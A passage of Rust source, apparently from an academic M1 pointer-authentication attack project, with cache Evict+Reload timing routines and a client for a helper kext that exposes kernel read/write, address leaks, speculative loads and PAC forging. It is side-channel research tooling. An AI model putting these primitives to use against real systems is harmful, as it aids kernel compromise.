handle.kernel_virt_to_phys(kernel_mmap_va).unwrap(); 47 | let target_set = cache::get_cache_set_m1(kernel_mmap_pa); 48 | println!("Kernel mmap VA: 0x{:X}\n PA: 0x{:X}\n", kernel_mmap_va, kernel_mmap_pa); 49 | println!("Generating eviction set to match address with L2 set {}...", target_set); 50 | 51 | let evset = data_pevset(kernel_mmap_va, kernel_mmap_pa, shared_mem); 52 | println!("Found {} conflicts.", evset.len()); 53 | 54 | // Evict + Reload 55 | for num_test_addrs in 0..TRIALS { 56 | let mut averages = [0; NUM_RETRIALS]; 57 | let mut trial_accumulator = 0; 58 | for retrial_idx in 0..NUM_RETRIALS { 59 | // Chose an eviction set of size `num_test_addrs`... 60 | let mut chosen : Vec = evset.choose_multiple(&mut rand::thread_rng(), num_test_addrs + 1).into_iter().cloned().collect(); 61 | let evict_me = chosen.pop().unwrap(); 62 | 63 | // ...and access them in a random order 64 | // Don't do pointer chasing as the DMP can predict that 65 | // Instead just index the vector randomly 66 | let mut indexes : Vec = (0..chosen.len()).collect(); 67 | indexes.shuffle(&mut thread_rng()); 68 | 69 | let mut measurements = [0; TRIAL_REPEAT]; 70 | 71 | for cur_trial in 0..TRIAL_REPEAT+1 { 72 | let init_read_time = timer::time_access(evict_me); 73 | 74 | for i in 0..num_test_addrs { 75 | timer::time_access(chosen[indexes[i]]); 76 | } 77 | 78 | let reload_time = timer::time_access(evict_me); 79 | 80 | // Skip the very first trial as its latency is always way too high 81 | if cur_trial != 0 { 82 | measurements[cur_trial - 1] = reload_time; 83 | } 84 | } 85 | 86 | let mut average : u64 = 0; 87 | for i in 0..TRIAL_REPEAT { 88 | average += measurements[i]; 89 | } 90 | average /= (TRIAL_REPEAT as u64); 91 | trial_accumulator += average; 92 | averages[retrial_idx] = average; 93 | } 94 | print!("'{}': [", num_test_addrs); 95 | 96 | for i in averages { 97 | print!("{},", i); 98 | } 99 | 100 | println!("],"); 101 | } 102 | } 103 | 104 | /** 105 | * Evict+Reload for instruction accesses. 106 | * 107 | * TLDR: 108 | * ``` 109 | * for num_test_addrs in range(TRIALS): 110 | * for retrial_idx in range(NUM_RETRIALS): 111 | * chosen = evset.sample(num_test_addrs) 112 | * 113 | * for cur_trial in range(TRIAL_REPEAT): 114 | * execute test addr 115 | * execute chosen set in random order 116 | * execute (again) test addr 117 | * record execute latency 118 | * 119 | * print(average(execute latencies for a given trial size)) 120 | * ``` 121 | */ 122 | pub unsafe fn inst_evict_reload(shared_mem: &mut [u8]) { 123 | let handle = match PacmanKitConnection::init() { 124 | Some(v) => v, 125 | None => panic!("Couldn't connect to PacmanKit"), 126 | }; 127 | 128 | let mut kernel_mmap_va = match handle.kernel_mmap() { 129 | Ok(v) => v, 130 | Err(err) => panic!("Couldn't call IOMalloc in the kernel!"), 131 | }; 132 | 133 | let kernel_mmap_pa = handle.kernel_virt_to_phys(kernel_mmap_va).unwrap(); 134 | let target_set = cache::get_cache_set_m1(kernel_mmap_pa); 135 | println!("Kernel mmap VA: 0x{:X}\n PA: 0x{:X}\n", kernel_mmap_va, kernel_mmap_pa); 136 | println!("Generating eviction set to match address with L2 set {}...", target_set); 137 | 138 | let evset = inst_pevset(kernel_mmap_va, kernel_mmap_pa, shared_mem); 139 | println!("Found {} conflicts.", evset.len()); 140 | 141 | // Evict + Reload 142 | for num_test_addrs in 0..TRIALS { 143 | let mut averages = [0; NUM_RETRIALS]; 144 | let mut trial_accumulator = 0; 145 | for retrial_idx in 0..NUM_RETRIALS { 146 | // init_memory(shared_mem); 147 | 148 | // Chose an eviction set of size `num_test_addrs`... 149 | let mut chosen : Vec = evset.choose_multiple(&mut rand::thread_rng(), num_test_addrs + 1).into_iter().cloned().collect(); 150 | let evict_me = chosen.pop().unwrap(); 151 | 152 | // ...and access them in a random order 153 | // Don't do pointer chasing as the DMP can predict that 154 | // Instead just index the vector randomly 155 | let mut indexes : Vec = (0..chosen.len()).collect(); 156 | indexes.shuffle(&mut thread_rng()); 157 | 158 | let mut measurements = [0; TRIAL_REPEAT]; 159 | 160 | for cur_trial in 0..TRIAL_REPEAT+1 { 161 | let init_read_time = timer::time_exec(evict_me); 162 | 163 | for i in 0..num_test_addrs { 164 | timer::time_exec(chosen[indexes[i]]); 165 | } 166 | 167 | let reload_time = timer::time_exec(evict_me); 168 | 169 | // Skip the very first trial as its latency is always way too high 170 | if cur_trial != 0 { 171 | measurements[cur_trial - 1] = reload_time; 172 | } 173 | } 174 | 175 | let mut average : u64 = 0; 176 | for i in 0..TRIAL_REPEAT { 177 | average += measurements[i]; 178 | } 179 | average /= (TRIAL_REPEAT as u64); 180 | trial_accumulator += average; 181 | averages[retrial_idx] = average; 182 | } 183 | print!("'{}': [", num_test_addrs); 184 | 185 | for i in averages { 186 | print!("{},", i); 187 | } 188 | 189 | println!("],"); 190 | } 191 | } 192 | 193 | /** 194 | * Evict+Reload for data accesses in the kernel. 195 | * 196 | * Keep this in sync with `data_evict_reload`! 197 | */ 198 | pub unsafe fn data_evict_reload_kernel(shared_mem: &mut [u8]) { 199 | let handle = match PacmanKitConnection::init() { 200 | Some(v) => v, 201 | None => panic!("Couldn't connect to PacmanKit"), 202 | }; 203 | 204 | let kernel_target_va = handle.leak_limit_location().unwrap(); 205 | // let kernel_target_va = handle.kernel_mmap().unwrap(); 206 | let kernel_target_pa = handle.kernel_virt_to_phys(kernel_target_va).unwrap(); 207 | 208 | let target_set = cache::get_cache_set_m1(kernel_target_pa); 209 | println!("Kernel target VA: 0x{:X}\n PA: 0x{:X}\n Contents: 0x{:X}\n", kernel_target_va, kernel_target_pa, handle.kernel_read(kernel_target_va).unwrap()); 210 | println!("Generating eviction set to match address with L2 set {}...", target_set); 211 | 212 | let evset = data_pevset(kernel_target_va, kernel_target_pa, shared_mem); 213 | println!("Found {} conflicts.", evset.len()); 214 | 215 | // Evict + Reload 216 | for num_test_addrs in 0..evset.len() { 217 | let mut averages = [0; NUM_RETRIALS]; 218 | let mut trial_accumulator = 0; 219 | for retrial_idx in 0..NUM_RETRIALS { 220 | // Chose an eviction set of size `num_test_addrs`... 221 | let mut chosen : Vec = evset.choose_multiple(&mut rand::thread_rng(), num_test_addrs + 1).into_iter().cloned().collect(); 222 | 223 | // For the user mode version, we use something from the evset as our reload target 224 | // Since we're using the kernel, we can ignore this popped value 225 | // Keep it here to ensure the index math lines up with the user version of this method, though. 226 | let ignore_this = chosen.pop().unwrap(); 227 | 228 | // ...and access them in a random order 229 | // Don't do pointer chasing as the DMP can predict that 230 | // Instead just index the vector randomly 231 | let mut indexes : Vec = (0..chosen.len()).collect(); 232 | indexes.shuffle(&mut thread_rng()); 233 | 234 | let mut measurements = [0; TRIAL_REPEAT]; 235 | 236 | for cur_trial in 0..TRIAL_REPEAT+1 { 237 | let init_read_time = handle.kernel_read_for_timing(kernel_target_va, true).unwrap(); 238 | 239 | for i in 0..num_test_addrs { 240 | timer::time_access(chosen[indexes[i]]); 241 | } 242 | 243 | let reload_time = handle.kernel_read_for_timing(kernel_target_va, true).unwrap(); 244 | 245 | // Skip the very first trial as its latency is always way too high 246 | if cur_trial != 0 { 247 | measurements[cur_trial - 1] = reload_time; 248 | } 249 | } 250 | 251 | let mut average : u64 = 0; 252 | for i in 0..TRIAL_REPEAT { 253 | average += measurements[i]; 254 | } 255 | average /= (TRIAL_REPEAT as u64); 256 | trial_accumulator += average; 257 | averages[retrial_idx] = average; 258 | } 259 | print!("'{}': [", num_test_addrs); 260 | 261 | for i in averages { 262 | print!("{},", i); 263 | } 264 | 265 | println!("],"); 266 | } 267 | } 268 | 269 | /** 270 | * Evict+Reload for instruction accesses. 271 | * 272 | * Keep this in sync with `inst_evict_reload`! 273 | */ 274 | pub unsafe fn inst_evict_reload_kernel(shared_mem: &mut [u8]) { 275 | let handle = match PacmanKitConnection::init() { 276 | Some(v) => v, 277 | None => panic!("Couldn't connect to PacmanKit"), 278 | }; 279 | 280 | let kernel_method_va = handle.leak_retpoline().unwrap() | PAC_BITMASK; // + 0x30C0; 281 | // let kernel_method_va = handle.get_kernel_base().unwrap() + attacks::pacman::INST_TARGET_OFFSET; 282 | 283 | let kernel_method_pa = handle.kernel_virt_to_phys(kernel_method_va).unwrap(); 284 | let target_set = cache::get_cache_set_m1(kernel_method_pa); 285 | println!("Kernel mmap VA: 0x{:X}\n PA: 0x{:X}\n", kernel_method_va, kernel_method_pa); 286 | println!("Generating eviction set to match address with L2 set {}...", target_set); 287 | 288 | let evset = inst_pevset(kernel_method_va, kernel_method_pa, shared_mem); 289 | println!("Found {} conflicts.", evset.len()); 290 | 291 | // Evict + Reload 292 | for num_test_addrs in 0..TRIALS { 293 | let mut averages = [0; NUM_RETRIALS]; 294 | let mut trial_accumulator = 0; 295 | for retrial_idx in 0..NUM_RETRIALS { 296 | // init_memory(shared_mem); 297 | 298 | // Chose an eviction set of size `num_test_addrs`... 299 | let mut chosen : Vec = evset.choose_multiple(&mut rand::thread_rng(), num_test_addrs + 1).into_iter().cloned().collect(); 300 | 301 | // For the user mode version, we use something from the evset as our reload target 302 | // Since we're using the kernel, we can ignore this popped value 303 | // Keep it here to ensure the index math lines up with the user version of this method, though. 304 | let ignore_this = chosen.pop().unwrap(); 305 | 306 | // ...and access them in a random order 307 | // Don't do pointer chasing as the DMP can predict that 308 | // Instead just index the vector randomly 309 | let mut indexes : Vec = (0..chosen.len()).collect(); 310 | indexes.shuffle(&mut thread_rng()); 311 | 312 | let mut measurements = [0; TRIAL_REPEAT]; 313 | 314 | for cur_trial in 0..TRIAL_REPEAT+1 { 315 | let init_read_time = handle.kernel_exec_for_timing(kernel_method_va, true).unwrap(); 316 | 317 | for i in 0..num_test_addrs { 318 | timer::time_exec(chosen[indexes[i]]); 319 | } 320 | 321 | let reload_time = handle.kernel_exec_for_timing(kernel_method_va, true).unwrap(); 322 | 323 | // Skip the very first trial as its latency is always way too high 324 | if cur_trial != 0 { 325 | measurements[cur_trial - 1] = reload_time; 326 | } 327 | } 328 | 329 | let mut average : u64 = 0; 330 | for i in 0..TRIAL_REPEAT { 331 | average += measurements[i]; 332 | } 333 | average /= (TRIAL_REPEAT as u64); 334 | trial_accumulator += average; 335 | averages[retrial_idx] = average; 336 | } 337 | print!("'{}': [", num_test_addrs); 338 | 339 | for i in averages { 340 | print!("{},", i); 341 | } 342 | 343 | println!("],"); 344 | } 345 | } 346 | 347 | /** 348 | * Evict+Reload for data accesses in the kernel using an eviction set also in the kernel. 349 | * 350 | * This is mostly useful for testing. 351 | * 352 | * Keep this in sync with `data_evict_reload`! 353 | */ 354 | pub unsafe fn data_evict_reload_kernel_kernel_evset(shared_mem: &mut [u8]) { 355 | let handle = match PacmanKitConnection::init() { 356 | Some(v) => v, 357 | None => panic!("Couldn't connect to PacmanKit"), 358 | }; 359 | 360 | let kernel_limit_addr = handle.leak_limit_location().unwrap(); 361 | let kernel_mmap_addr = handle.kernel_mmap().unwrap(); 362 | let kernel_target_va = kernel_limit_addr; 363 | // let kernel_target_va = kernel_mmap_addr; 364 | let kernel_target_pa = handle.kernel_virt_to_phys(kernel_target_va).unwrap(); 365 | 366 | let target_set = cache::get_cache_set_m1(kernel_target_pa); 367 | println!("Kernel target VA: 0x{:X}\n PA: 0x{:X}\n Contents: 0x{:X}\n", kernel_target_va, kernel_target_pa, handle.kernel_read(kernel_target_va).unwrap()); 368 | println!("Generating eviction set to match address with L2 set {}...", target_set); 369 | 370 | // let evset = data_pevset(kernel_target_va, kernel_target_pa, shared_mem); 371 | let evset = data_kpevset(kernel_target_va, kernel_target_pa, kernel_mmap_addr, 0xC000 * cache::PAGE_SIZE); 372 | println!("Found {} conflicts.", evset.len()); 373 | 374 | for i in 0..evset.len() { 375 | if i > 100 {break;} 376 | let print_va = evset[i]; 377 | println!("0x{:X}\t=>\t0x{:X}", print_va, handle.kernel_virt_to_phys(print_va).unwrap()); 378 | } 379 | 380 | // Evict + Reload 381 | for num_test_addrs in 0..evset.len() { 382 | let mut averages = [0; NUM_RETRIALS]; 383 | let mut trial_accumulator = 0; 384 | for retrial_idx in 0..NUM_RETRIALS { 385 | // Chose an eviction set of size `num_test_addrs`... 386 | let mut chosen : Vec = evset.choose_multiple(&mut rand::thread_rng(), num_test_addrs + 1).into_iter().cloned().collect(); 387 | 388 | // For the user mode version, we use something from the evset as our reload target 389 | // Since we're using the kernel, we can ignore this popped value 390 | // Keep it here to ensure the index math lines up with the user version of this method, though. 391 | let ignore_this = chosen.pop().unwrap(); 392 | 393 | // ...and access them in a random order 394 | // Don't do pointer chasing as the DMP can predict that 395 | // Instead just index the vector randomly 396 | let mut indexes : Vec = (0..chosen.len()).collect(); 397 | indexes.shuffle(&mut thread_rng()); 398 | 399 | let mut measurements = [0; TRIAL_REPEAT]; 400 | 401 | for cur_trial in 0..TRIAL_REPEAT+1 { 402 | let init_read_time = handle.kernel_read_for_timing(kernel_target_va, true).unwrap(); 403 | 404 | for i in 0..num_test_addrs { 405 | // timer::time_access(chosen[indexes[i]]); 406 | handle.kernel_read_for_timing(chosen[indexes[i]], true).unwrap(); 407 | } 408 | 409 | // Flush the entire cache: 410 | // init_memory(shared_mem); 411 | // flush_cache(shared_mem); 412 | 413 | let reload_time = handle.kernel_read_for_timing(kernel_target_va, true).unwrap(); 414 | 415 | // Skip the very first trial as its latency is always way too high 416 | if cur_trial != 0 { 417 | measurements[cur_trial - 1] = reload_time; 418 | } 419 | } 420 | 421 | let mut average : u64 = 0; 422 | for i in 0..TRIAL_REPEAT { 423 | average += measurements[i]; 424 | } 425 | average /= (TRIAL_REPEAT as u64); 426 | trial_accumulator += average; 427 | averages[retrial_idx] = average; 428 | } 429 | print!("'{}': [", num_test_addrs); 430 | 431 | for i in averages { 432 | print!("{},", i); 433 | } 434 | 435 | println!("],"); 436 | } 437 | } 438 | -------------------------------------------------------------------------------- /src/pacmankit.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * Shared information between the user attack and the PacmanKit kext. 3 | */ 4 | use std::ffi::{CStr, CString}; 5 | use crate::iokit::*; 6 | use crate::mach::*; 7 | use crate::timer; 8 | 9 | /// Offset in bytes within a PacmanUser IOUserClient to the helper field 10 | pub const PACMANKIT_TO_HELPER : u64 = 0xE0; 11 | 12 | /** 13 | * The operations supported by the PacmanKit kext. 14 | * 15 | * Each of these is an ::externalMethod selector. 16 | */ 17 | #[repr(u32)] 18 | pub enum PacmanKitOp { 19 | KernelBase = 0x00, 20 | Read = 0x01, 21 | Write = 0x02, 22 | KernelVirt2Phys = 0x03, 23 | UserVirt2Phys = 0x04, 24 | IOUserClientLeak = 0x05, 25 | GimmeMemory = 0x06, 26 | FreeMemory = 0x07, 27 | TellMeRegs = 0x08, 28 | ReadForTiming = 0x09, 29 | ExecForTiming = 0x0A, 30 | LeakMethod = 0x0B, 31 | ReadForSpectre = 0x0C, 32 | ExecForSpectre = 0x0D, 33 | CallServiceRoutine= 0x0E, 34 | ForgeSignData = 0x0F, 35 | ForgeAuthData = 0x10, 36 | ForgeSignInst = 0x11, 37 | ForgeAuthInst = 0x12, 38 | LeakCurProc = 0x13, 39 | } 40 | 41 | /** 42 | * An object representing a connection to the PacmanKit IOUserClient in the PacmanKit kext. 43 | * 44 | * This can be used to run all the operations provided by the PacmanKit kext. 45 | */ 46 | pub struct PacmanKitConnection(IOConnect, IOService); 47 | 48 | impl PacmanKitConnection { 49 | /** 50 | * Create a new PacmanKitConnection. 51 | * This opens a new IOUserClient and may fail. 52 | * 53 | * # Return Value 54 | * Returns the `kern_return_t` error on failure, a valid PacmanKitConnection on success. 55 | */ 56 | pub unsafe fn init() -> Option { 57 | let mut kret : KernReturn; 58 | let mut name : IOName = [0;128]; 59 | let mut handle : IOConnect = 0; 60 | let service_name = CString::new("PacmanKit").unwrap(); 61 | let serv = IOServiceGetMatchingService(kIOMainPortDefault, IOServiceMatching(service_name.as_ptr())); 62 | if IO_OBJECT_NULL == serv { 63 | println!("Couldn't find PacmanKit. Did you remember to install it?"); 64 | return None; 65 | } 66 | 67 | IORegistryEntryGetName(serv, &mut name); 68 | kret = IOServiceOpen(serv, mach_task_self(), 0, &mut handle); 69 | if KERN_SUCCESS != kret { 70 | println!("Couldn't connect to IOService {:?} (error {:?}", CStr::from_ptr(&name as *const _), CStr::from_ptr(mach_error_string(kret))); 71 | IOObjectRelease(serv); 72 | return None; 73 | } 74 | 75 | return Some(Self( 76 | handle, 77 | serv 78 | )); 79 | } 80 | 81 | /** 82 | * Returns the kernel base address (pointer to the macho header of the kernelcache). 83 | */ 84 | pub unsafe fn get_kernel_base(&self) -> Result { 85 | let mut kaslr_base = 0; 86 | let mut output_cnt = 1; 87 | let kret = IOConnectCallScalarMethod( 88 | self.0, 89 | PacmanKitOp::KernelBase as u32, 90 | core::ptr::null(), 91 | 0, 92 | &mut kaslr_base, 93 | &mut output_cnt 94 | ); 95 | 96 | if kret != KERN_SUCCESS { 97 | println!("Couldn't leak kernel base! (error {:?})", CStr::from_ptr(mach_error_string(kret))); 98 | return Err(kret); 99 | } 100 | 101 | return Ok(kaslr_base); 102 | } 103 | 104 | /** 105 | * Read a u64 from kernel virtual memory. 106 | */ 107 | pub unsafe fn kernel_read(&self, addr: u64) -> Result { 108 | let mut output_cnt = 1; 109 | let mut read_out = 0; 110 | let kret = IOConnectCallScalarMethod( 111 | self.0, 112 | PacmanKitOp::Read as u32, 113 | &addr, 114 | 1, 115 | &mut read_out, 116 | &mut output_cnt 117 | ); 118 | 119 | if KERN_SUCCESS != kret { 120 | println!("Couldn't read from kernel memory (error {:?})", CStr::from_ptr(mach_error_string(kret))); 121 | return Err(kret); 122 | } 123 | 124 | return Ok(read_out); 125 | } 126 | 127 | /** 128 | * Write a u64 into kernel memory. 129 | */ 130 | pub unsafe fn kernel_write(&self, addr: u64, val: u64) -> Result<(), KernReturn> { 131 | let args : [u64; 2] = [addr, val]; 132 | let kret = IOConnectCallScalarMethod( 133 | self.0, 134 | PacmanKitOp::Write as u32, 135 | args.as_ptr(), 136 | 2, 137 | core::ptr::null_mut(), 138 | core::ptr::null_mut() 139 | ); 140 | 141 | if KERN_SUCCESS != kret { 142 | println!("Couldn't write to kernel memory (error {:?})", CStr::from_ptr(mach_error_string(kret))); 143 | return Err(kret); 144 | } 145 | 146 | return Ok(()); 147 | } 148 | 149 | /** 150 | * Translate a kernel virtual address to its physical address. 151 | */ 152 | pub unsafe fn kernel_virt_to_phys(&self, addr: u64) -> Result { 153 | let mut output_cnt = 1; 154 | let mut translate_out = 0; 155 | let kret = IOConnectCallScalarMethod( 156 | self.0, 157 | PacmanKitOp::KernelVirt2Phys as u32, 158 | &addr, 159 | 1, 160 | &mut translate_out, 161 | &mut output_cnt 162 | ); 163 | 164 | if KERN_SUCCESS != kret { 165 | println!("Couldn't translate kernel address (error {:?})", CStr::from_ptr(mach_error_string(kret))); 166 | return Err(kret); 167 | } 168 | 169 | return Ok(translate_out); 170 | } 171 | 172 | /** 173 | * Translate a user virtual address to its physical address. 174 | */ 175 | pub unsafe fn user_virt_to_phys(&self, addr: u64) -> Result { 176 | let mut output_cnt = 1; 177 | let mut translate_out = 0; 178 | let kret = IOConnectCallScalarMethod( 179 | self.0, 180 | PacmanKitOp::UserVirt2Phys as u32, 181 | &addr, 182 | 1, 183 | &mut translate_out, 184 | &mut output_cnt 185 | ); 186 | 187 | if KERN_SUCCESS != kret { 188 | println!("Couldn't translate user address (error {:?})", CStr::from_ptr(mach_error_string(kret))); 189 | return Err(kret); 190 | } 191 | 192 | return Ok(translate_out); 193 | } 194 | 195 | /** 196 | * Returns a pointer to this IOUserClient in the kernel. 197 | */ 198 | pub unsafe fn get_handle_loc(&self) -> Result { 199 | let mut handle_loc = 0; 200 | let mut output_cnt = 1; 201 | let kret = IOConnectCallScalarMethod( 202 | self.0, 203 | PacmanKitOp::IOUserClientLeak as u32, 204 | core::ptr::null(), 205 | 0, 206 | &mut handle_loc, 207 | &mut output_cnt 208 | ); 209 | 210 | if KERN_SUCCESS != kret { 211 | println!("Couldn't get IOConnect virtual address (error {:?})", CStr::from_ptr(mach_error_string(kret))); 212 | return Err(kret); 213 | } 214 | 215 | return Ok(handle_loc); 216 | } 217 | 218 | /** 219 | * Returns a pointer to a kernel memory region mmap'ed by IOMallocAligned to a page size. 220 | */ 221 | pub unsafe fn kernel_mmap(&self) -> Result { 222 | let mut mmap_ptr = 0; 223 | let mut output_cnt = 1; 224 | let kret = IOConnectCallScalarMethod( 225 | self.0, 226 | PacmanKitOp::GimmeMemory as u32, 227 | core::ptr::null(), 228 | 0, 229 | &mut mmap_ptr, 230 | &mut output_cnt 231 | ); 232 | 233 | if KERN_SUCCESS != kret { 234 | println!("Couldn't get kernel mmap (error {:?})", CStr::from_ptr(mach_error_string(kret))); 235 | return Err(kret); 236 | } 237 | 238 | return Ok(mmap_ptr); 239 | } 240 | 241 | /** 242 | * Frees memory allocated by kernel_mmap. 243 | */ 244 | pub unsafe fn kernel_free(&self) -> Result<(), KernReturn> { 245 | let kret = IOConnectCallScalarMethod( 246 | self.0, 247 | PacmanKitOp::FreeMemory as u32, 248 | core::ptr::null(), 249 | 0, 250 | core::ptr::null_mut(), 251 | core::ptr::null_mut() 252 | ); 253 | 254 | if KERN_SUCCESS != kret { 255 | println!("Couldn't get kernel mmap (error {:?})", CStr::from_ptr(mach_error_string(kret))); 256 | return Err(kret); 257 | } 258 | 259 | return Ok(()); 260 | } 261 | 262 | pub unsafe fn list_timer_regs(&self) { 263 | let mut rval : [u64; 2] = [0, 0]; 264 | let mut num_args : u32 = 2; 265 | let kret = IOConnectCallScalarMethod( 266 | self.0, 267 | PacmanKitOp::TellMeRegs as u32, 268 | core::ptr::null(), 269 | 0, 270 | rval.as_mut_ptr(), 271 | &mut num_args as *mut _, 272 | ); 273 | 274 | if KERN_SUCCESS != kret { 275 | println!("Couldn't read timer MSRs (error {:?})", CStr::from_ptr(mach_error_string(kret))); 276 | return; 277 | } 278 | 279 | println!("PMCR0 is 0x{:X}", rval[0]); 280 | println!("CNTKCTL_EL1 is 0x{:X}", rval[1]); 281 | 282 | return; 283 | } 284 | 285 | /** 286 | * Read a u64 from kernel virtual memory without any IOMemoryDescriptor calls. 287 | * This *CAN* panic the kernel! 288 | * 289 | * # Arguments 290 | * * `addr`: A kernel address to load 291 | * * `do_it`: Should the load actually run? 292 | * 293 | * # Return Value 294 | * Returns the number of cycles taken if `do_it` was true. Else, returns an undefined value. 295 | */ 296 | pub unsafe fn kernel_read_for_timing(&self, addr: u64, do_it: bool) -> Result { 297 | let mut output_cnt = 1; 298 | let mut read_out = 0; 299 | let args : [u64; 2] = [addr, do_it as u64]; 300 | let kret = IOConnectCallScalarMethod( 301 | self.0, 302 | PacmanKitOp::ReadForTiming as u32, 303 | args.as_ptr(), 304 | 2, 305 | &mut read_out, 306 | &mut output_cnt 307 | ); 308 | 309 | if KERN_SUCCESS != kret { 310 | println!("Couldn't read from kernel memory (error {:?})", CStr::from_ptr(mach_error_string(kret))); 311 | return Err(kret); 312 | } 313 | 314 | return Ok(read_out - timer::TIMER_OVERHEAD_PCORE); 315 | } 316 | 317 | /** 318 | * Exec a u64 from kernel virtual memory without any IOMemoryDescriptor calls. 319 | * This *CAN* panic the kernel! 320 | * 321 | * # Arguments 322 | * * `addr`: A kernel address to exec 323 | * * `do_it`: Should the call actually run? 324 | * 325 | * # Return Value 326 | * Returns the number of cycles taken if `do_it` was true. Else, returns an undefined value. 327 | */ 328 | pub unsafe fn kernel_exec_for_timing(&self, addr: u64, do_it: bool) -> Result { 329 | let mut output_cnt = 1; 330 | let mut read_out = 0; 331 | let args : [u64; 2] = [addr, do_it as u64]; 332 | let kret = IOConnectCallScalarMethod( 333 | self.0, 334 | PacmanKitOp::ExecForTiming as u32, 335 | args.as_ptr(), 336 | 2, 337 | &mut read_out, 338 | &mut output_cnt 339 | ); 340 | 341 | if KERN_SUCCESS != kret { 342 | println!("Couldn't exec from kernel memory (error {:?})", CStr::from_ptr(mach_error_string(kret))); 343 | return Err(kret); 344 | } 345 | 346 | return Ok(read_out - timer::TIMER_OVERHEAD_PCORE); 347 | } 348 | 349 | /** 350 | * Returns a pointer to a kernel method that just runs `ret`. 351 | */ 352 | pub unsafe fn leak_retpoline(&self) -> Result { 353 | let mut method_leak_ptr : [u64; 3] = [0; 3]; 354 | let mut output_cnt = 3; 355 | let kret = IOConnectCallScalarMethod( 356 | self.0, 357 | PacmanKitOp::LeakMethod as u32, 358 | core::ptr::null(), 359 | 0, 360 | method_leak_ptr.as_mut_ptr(), 361 | &mut output_cnt 362 | ); 363 | 364 | if KERN_SUCCESS != kret { 365 | println!("Couldn't get reveal address of a kernel method (error {:?})", CStr::from_ptr(mach_error_string(kret))); 366 | return Err(kret); 367 | } 368 | 369 | return Ok(method_leak_ptr[0]); 370 | } 371 | 372 | /** 373 | * Returns a pointer to the `LIMIT` variable in the PacmanKit kext. 374 | */ 375 | pub unsafe fn leak_limit_location(&self) -> Result { 376 | let mut method_leak_ptr : [u64; 3] = [0; 3]; 377 | let mut output_cnt = 3; 378 | let kret = IOConnectCallScalarMethod( 379 | self.0, 380 | PacmanKitOp::LeakMethod as u32, 381 | core::ptr::null(), 382 | 0, 383 | method_leak_ptr.as_mut_ptr(), 384 | &mut output_cnt 385 | ); 386 | 387 | if KERN_SUCCESS != kret { 388 | println!("Couldn't get reveal address of the kext limit (error {:?})", CStr::from_ptr(mach_error_string(kret))); 389 | return Err(kret); 390 | } 391 | 392 | return Ok(method_leak_ptr[1]); 393 | } 394 | 395 | /** 396 | * Returns a pointer to the win() method in the PacmanKit kext. 397 | */ 398 | pub unsafe fn leak_win(&self) -> Result { 399 | panic!("This has been deprecated- use leak_retpoline to reveal a region full of `ret`s that can be used"); 400 | // let mut method_leak_ptr : [u64; 3] = [0; 3]; 401 | // let mut output_cnt = 3; 402 | // let kret = IOConnectCallScalarMethod( 403 | // self.0, 404 | // PacmanKitOp::LeakMethod as u32, 405 | // core::ptr::null(), 406 | // 0, 407 | // method_leak_ptr.as_mut_ptr(), 408 | // &mut output_cnt 409 | // ); 410 | 411 | // if KERN_SUCCESS != kret { 412 | // println!("Couldn't get reveal address of the kext limit (error {:?})", CStr::from_ptr(mach_error_string(kret))); 413 | // return Err(kret); 414 | // } 415 | 416 | // return Ok(method_leak_ptr[2]); 417 | } 418 | 419 | /** 420 | * Read a u64 from kernel virtual memory without any IOMemoryDescriptor calls. 421 | * This *CAN* panic the kernel! 422 | * 423 | * This is very similar to kernel_read_for_timing except it features no synchronization 424 | * barriers (so speculation can cause the load to happen) and does not report any latencies. 425 | * 426 | * # Arguments 427 | * * `addr`: A kernel address to load 428 | * * `idx`: Index passed in to the 'bounds check' 429 | * 430 | * # Return Value 431 | * Returns Nothing. 432 | */ 433 | pub unsafe fn kernel_read_for_spectre(&self, addr: u64, idx: u64) -> Result<(), KernReturn> { 434 | let args : [u64; 2] = [addr, idx]; 435 | let kret = IOConnectCallScalarMethod( 436 | self.0, 437 | PacmanKitOp::ReadForSpectre as u32, 438 | args.as_ptr(), 439 | 2, 440 | core::ptr::null_mut(), 441 | core::ptr::null_mut(), 442 | ); 443 | 444 | if KERN_SUCCESS != kret { 445 | println!("Couldn't read from kernel memory (error {:?})", CStr::from_ptr(mach_error_string(kret))); 446 | return Err(kret); 447 | } 448 | 449 | return Ok(()); 450 | } 451 | 452 | /** 453 | * Exec a u64 from kernel virtual memory without any IOMemoryDescriptor calls. 454 | * This *CAN* panic the kernel! 455 | * 456 | * This is very similar to kernel_exec_for_timing except it features no synchronization 457 | * barriers (so speculation can cause the load to happen) and does not report any latencies. 458 | * 459 | * # Arguments 460 | * * `addr`: A kernel address to exec 461 | * * `idx`: Index passed in to the 'bounds check' 462 | * 463 | * # Return Value 464 | * Returns Nothing. 465 | */ 466 | pub unsafe fn kernel_exec_for_spectre(&self, addr: u64, idx: u64) -> Result<(), KernReturn> { 467 | let args : [u64; 2] = [addr, idx]; 468 | let kret = IOConnectCallScalarMethod( 469 | self.0, 470 | PacmanKitOp::ExecForSpectre as u32, 471 | args.as_ptr(), 472 | 2, 473 | core::ptr::null_mut(), 474 | core::ptr::null_mut(), 475 | ); 476 | 477 | if KERN_SUCCESS != kret { 478 | println!("Couldn't exec from kernel memory (error {:?})", CStr::from_ptr(mach_error_string(kret))); 479 | return Err(kret); 480 | } 481 | 482 | return Ok(()); 483 | } 484 | 485 | pub unsafe fn call_service_routine(&self, arg1: u64, arg2: u64, arg3: u64, arg4: u64, arg5: u64, arg6: u64) -> Result { 486 | let args : [u64; 6] = [arg1, arg2, arg3, arg4, arg5, arg6]; 487 | let mut output_cnt = 1; 488 | let mut output_val = 0u64; 489 | 490 | let kret = IOConnectCallScalarMethod( 491 | self.0, 492 | PacmanKitOp::CallServiceRoutine as u32, 493 | args.as_ptr(), 494 | 6, 495 | &mut output_val, 496 | &mut output_cnt 497 | ); 498 | 499 | // Ignore errors... 500 | if KERN_SUCCESS != kret { 501 | // println!("Couldn't call service routine {}!", arg1); 502 | // return Err(kret); 503 | } 504 | 505 | return Ok(output_val); 506 | } 507 | 508 | /// Returns the correct PACDA signature from the kernel. This can ONLY be used for testing! 509 | /// The real attack will need to use brute force to find this. We only use this method to learn 510 | /// the ground truth for generating plots and tuning the algorithm. 511 | pub unsafe fn forge_sign_data(&self, addr: u64, salt: u64) -> Result { 512 | let args : [u64; 2] = [addr, salt]; 513 | let mut output_cnt = 1; 514 | let mut output_val = 1; 515 | 516 | let kret = IOConnectCallScalarMethod( 517 | self.0, 518 | PacmanKitOp::ForgeSignData as u32, 519 | args.as_ptr(), 520 | 2, 521 | &mut output_val, 522 | &mut output_cnt 523 | ); 524 | 525 | if KERN_SUCCESS != kret { 526 | println!("Couldn't forge 